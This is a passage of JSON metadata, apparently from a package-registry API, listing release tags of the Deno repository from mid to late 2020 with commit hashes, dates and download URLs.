s://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/de